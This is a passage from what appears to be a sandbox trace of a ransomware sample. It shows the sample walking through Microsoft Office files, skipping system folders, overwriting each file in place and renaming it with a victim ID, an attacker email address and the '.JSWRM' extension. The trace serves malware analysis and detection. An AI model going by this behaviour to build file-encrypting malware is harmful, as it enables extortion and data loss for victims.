lpMultiByteStr="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 58 [0101.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0101.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0101.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0101.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0101.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.874] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=103844) returned 1 [0101.874] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x195a0) returned 0x24c1d0 [0101.874] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x195a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x195a0, lpOverlapped=0x0) returned 1 [0101.882] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.882] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x195a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x195a0, lpOverlapped=0x0) returned 1 [0101.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0101.883] CloseHandle (hObject=0x45c) returned 1 [0101.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0101.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0101.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0101.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2475b0 [0101.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0101.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0101.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.883] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0101.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0101.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0101.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0101.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0101.884] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd33f011b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd33f011b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd35dffce, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x689e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.powerpointmui.msi.16.en-us.xml", cAlternateFileName="C27FF4~1.XML")) returned 1 [0101.884] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.884] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.885] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.885] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.885] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.885] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.885] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.885] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.885] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.885] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0101.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.powerpointmui.msi.16.en-us.xml", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0101.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.powerpointmui.msi.16.en-us.xml", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.powerpointmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 42 [0101.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0101.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0101.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.powerpointmui.msi.16.en-us.xml", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0101.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.powerpointmui.msi.16.en-us.xml", cchWideChar=42, lpMultiByteStr=0x22d0a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.powerpointmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 42 [0101.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0101.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0101.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0101.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0101.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.886] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26782) returned 1 [0101.886] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6890) returned 0x24c1d0 [0101.886] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6890, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6890, lpOverlapped=0x0) returned 1 [0101.892] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.892] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6890, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6890, lpOverlapped=0x0) returned 1 [0101.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0101.893] CloseHandle (hObject=0x45c) returned 1 [0101.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0101.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0101.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0101.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0101.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0101.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.893] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.powerpointmui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpointmui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0101.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0101.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.894] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b17ac3e, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b17ac3e, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b1a0d3d, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x7446, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", cAlternateFileName="C2E87B~1.XML")) returned 1 [0101.894] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.894] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.894] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.894] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.894] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.894] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.894] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.894] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.894] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.894] lstrcmpiW (lpString1="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0101.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0101.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 52 [0101.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0101.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0101.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0101.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0101.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x20d698, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Project.Project.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 52 [0101.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0101.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0101.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0101.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0101.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.project.project.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.934] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=29766) returned 1 [0101.935] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7440) returned 0x24c1d0 [0101.935] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x7440, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x7440, lpOverlapped=0x0) returned 1 [0101.938] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.938] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x7440, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x7440, lpOverlapped=0x0) returned 1 [0101.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0101.970] CloseHandle (hObject=0x45c) returned 1 [0101.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0101.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0101.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0101.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0101.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0101.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0101.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.970] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.project.project.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.project.project.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0101.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0101.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0101.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.972] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b2abe77, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b2abe77, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b2d20ad, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x809e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.projectmui.msi.16.en-us.xml", cAlternateFileName="C26005~1.XML")) returned 1 [0101.972] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.972] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.972] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.972] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.972] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.972] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.972] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.972] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.972] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.972] lstrcmpiW (lpString1="C2RManifest.projectmui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0101.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.projectmui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0101.972] RtlAllocateHeap (HeapHandle=0x1e0000, 